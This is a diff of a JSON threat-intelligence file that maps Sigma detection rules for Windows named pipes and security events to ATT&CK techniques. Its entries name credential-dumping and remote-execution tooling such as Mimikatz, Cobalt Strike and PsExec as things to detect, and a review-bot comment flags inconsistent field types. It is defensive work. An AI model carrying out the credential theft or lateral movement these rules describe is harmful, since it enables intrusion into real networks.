 "value": "Cred Dump-Tools Named Pipes"
 },
@@ -3024,11 +3912,11 @@
 "logsource.category": "pipe_created",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/SigmaHQ/sigma/issues/253",
- "https://twitter.com/d4rksystem/status/1357010969264873472",
- "https://redcanary.com/threat-detection-report/threats/cobalt-strike/",
 "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/",
 "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
+ "https://github.com/SigmaHQ/sigma/issues/253",
+ "https://redcanary.com/threat-detection-report/threats/cobalt-strike/",
+ "https://twitter.com/d4rksystem/status/1357010969264873472",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml"
 ],
 "tags": [
@@ -3063,6 +3951,15 @@
 "attack.t1106"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1",
 "value": "Turla Group Named Pipes"
 },
@@ -3087,6 +3984,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a",
 "value": "Alternate PowerShell Hosts Pipe"
 },
@@ -3134,6 +4040,15 @@
 "attack.t1569.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5",
 "value": "PAExec Default Named Pipe"
 },
@@ -3158,6 +4073,15 @@
 "attack.execution"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb",
 "value": "WMI Event Consumer Created Named Pipe"
 },
@@ -3182,6 +4106,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c",
 "value": "PowerShell Execution Via Named Pipe"
 },
@@ -3208,6 +4141,15 @@
 "attack.s0029"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463",
 "value": "PsExec Tool Execution From Suspicious Locations - PipeName"
 },
@@ -3260,6 +4202,15 @@
 "attack.t1569.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028",
 "value": "PsExec Pipes Artifacts"
 },
@@ -3276,18 +4227,18 @@
 "logsource.category": "pipe_created",
 "logsource.product": "windows",
 "refs": [
- "https://www.us-cert.gov/ncas/alerts/TA17-117A",
- "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a",
 "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
+ "https://www.us-cert.gov/ncas/alerts/TA17-117A",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a",
+ "https://securelist.com/faq-the-projectsauron-apt/75533/",
+ "https://github.com/RiccardoAncarani/LiquidSnake",
 "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
+ "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
 "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
 "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/",
- "https://securelist.com/faq-the-projectsauron-apt/75533/",
- "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
- "https://github.com/RiccardoAncarani/LiquidSnake",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml"
 ],
 "tags": [
@@ -3322,6 +4273,15 @@
 "attack.s0029"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c",
 "value": "PsExec Default Named Pipe"
 },
@@ -3338,9 +4298,9 @@
 "logsource.category": "pipe_created",
 "logsource.product": "windows",
 "refs": [
- "https://o365blog.com/post/adfs/",
 "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml",
 "https://github.com/Azure/SimuLand",
+ "https://o365blog.com/post/adfs/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml"
 ],
 "tags": [
@@ -3348,6 +4308,15 @@
 "attack.t1005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3",
 "value": "ADFS Database Named Pipe Connection"
 },
@@ -3374,6 +4343,22 @@
 "attack.t1134.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a",
 "value": "Koh Default Named Pipes"
 },
@@ -3407,6 +4392,36 @@
 "attack.t1003.006"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8",
 "value": "Mimikatz Use"
 },
@@ -3546,6 +4561,15 @@
 "attack.t1136.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea",
 "value": "Local User Creation"
 },
@@ -3572,6 +4596,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3",
 "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security"
 },
@@ -3622,6 +4655,15 @@
 "attack.t1134.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b7dc639b-24cd-482d-a7f1-8897eda21023",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2",
 "value": "Addition of SID History to Active Directory Object"
 },
@@ -3678,6 +4720,15 @@
 "car.2016-04-002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982",
 "value": "Security Eventlog Cleared"
 },
@@ -3695,8 +4746,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore",
- "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
 "https://twitter.com/MsftSecIntel/status/1257324139515269121",
+ "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml"
 ],
 "tags": [
@@ -3729,6 +4780,15 @@
 "attack.t1569.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c8b00925-926c-47e3-beea-298fd563728e",
 "value": "Remote Access Tool Services Have Been Installed - Security"
 },
@@ -3755,6 +4815,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a",
 "value": "Invoke-Obfuscation Via Use MSHTA - Security"
 },
@@ -3771,8 +4840,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml"
 ],
 "tags": [
@@ -3781,6 +4850,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76",
 "value": "Generic Password Dumper Activity on LSASS"
 },
@@ -3797,8 +4875,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423",
 "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml"
 ],
 "tags": "No established tags"
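Review bot: Hunk -3797 ends with `"tags": "No established tags"`, a string, while every other cluster in this diff has `tags` as an array (for example `"tags": [` in -3771 directly above), so a consumer iterating `meta.tags` either fails or iterates characters; the same sentinel appears in -4308 at L6300, and the sibling `"logsource.category": "No established category"` (here and in -3843, -3895, -3947, -3994, -4123, -4308, -4378, -4404, -4507) is the same pattern of encoding "absent" as a prose string. These lines are context, so the shape is carried over from the initial import rather than introduced here, but the generator that produced this commit is the place to fix it: `"tags": []` for the empty case, and either omit `logsource.category` or emit `null` when the rule has none. Keeping one type per key across the file is what lets downstream tooling treat the clusters uniformly.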
@@ -3843,8 +4921,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964",
 "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml"
 ],
@@ -3895,8 +4973,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://attack.mitre.org/software/S0359/",
 "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm",
+ "https://attack.mitre.org/software/S0359/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml"
 ],
 "tags": [
@@ -3906,6 +4984,15 @@
 "attack.t1016"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1",
 "value": "Correct Execution of Nltest.exe"
 },
@@ -3947,8 +5034,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
 "https://twitter.com/mattifestation/status/899646620148539397",
+ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml"
 ],
 "tags": [
@@ -3957,6 +5044,15 @@
 "attack.t1546.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88",
 "value": "WMI Persistence - Security"
 },
@@ -3994,8 +5090,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/menasec1/status/1106899890377052160",
 "https://www.secureworks.com/blog/ransomware-as-a-distraction",
+ "https://twitter.com/menasec1/status/1106899890377052160",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml"
 ],
 "tags": [
@@ -4004,6 +5100,15 @@
 "attack.t1053.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2",
 "value": "Persistence and Execution at Scale via GPO Scheduled Task"
 },
@@ -4123,10 +5228,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624",
- "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427",
- "https://github.com/sensepost/ruler",
 "https://github.com/sensepost/ruler/issues/47",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624",
+ "https://github.com/sensepost/ruler",
+ "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml"
 ],
@@ -4139,6 +5244,22 @@
 "attack.t1550.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "24549159-ac1b-479c-8175-d42aea947cae",
 "value": "Hacktool Ruler"
 },
@@ -4162,6 +5283,15 @@
 "attack.t1070.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a122ac13-daf8-4175-83a2-72c387be339d",
 "value": "Security Event Log Cleared"
 },
@@ -4179,8 +5309,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://awakesecurity.com/blog/threat-hunting-for-paexec/",
- "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf",
 "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
+ "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml"
 ],
 "tags": [
@@ -4192,6 +5322,22 @@
 "attack.t1569.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6",
 "value": "Malicious Service Installations"
 },
@@ -4292,6 +5438,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "value": "Invoke-Obfuscation Via Use Rundll32 - Security" }, @@ -4308,9 +5463,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" ], "tags": "No established tags" @@ -4378,9 +5533,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" ], "tags": [ 
@@ -4404,9 +5559,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" ], "tags": [ @@ -4419,6 +5574,36 @@ "attack.s0195" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", "value": "Secure Deletion with SDelete" }, @@ -4507,8 +5692,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1207671369963646976", "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" ], "tags": [ 
@@ -4522,6 +5707,29 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", "value": "Operation Wocao Activity - Security" }, @@ -4574,6 +5782,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "value": "Invoke-Obfuscation Via Stdin - Security" }, @@ -4601,6 +5818,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "value": "Metasploit Or Impacket Service Installation Via SMB PsExec" }, @@ -4625,6 +5858,15 @@ "attack.t1222.001" ] }, + "related": [ + { + "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "value": "AD Object WriteDAC Access" }, 
@@ -4648,6 +5890,15 @@ "attack.t1212" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", "value": "Kerberos Manipulation" }, @@ -4713,14 +5964,14 @@ "logsource.product": "windows", "refs": [ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml" ], "tags": "No established tags" 
@@ -4751,6 +6002,29 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", "value": "Transferring Files with Credential Data via Network Shares" }, @@ -4767,8 +6041,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", + "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" ], "tags": [ @@ -4800,6 +6074,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "value": "Remote PowerShell Sessions Network Connections (WinRM)" }, 
@@ -4816,9 +6099,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://github.com/fox-it/LDAPFragger", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" ], "tags": [ @@ -4826,6 +6109,15 @@ "attack.command_and_control" ] }, + "related": [ + { + "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "value": "Suspicious LDAP-Attributes Used" }, @@ -4878,6 +6170,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": 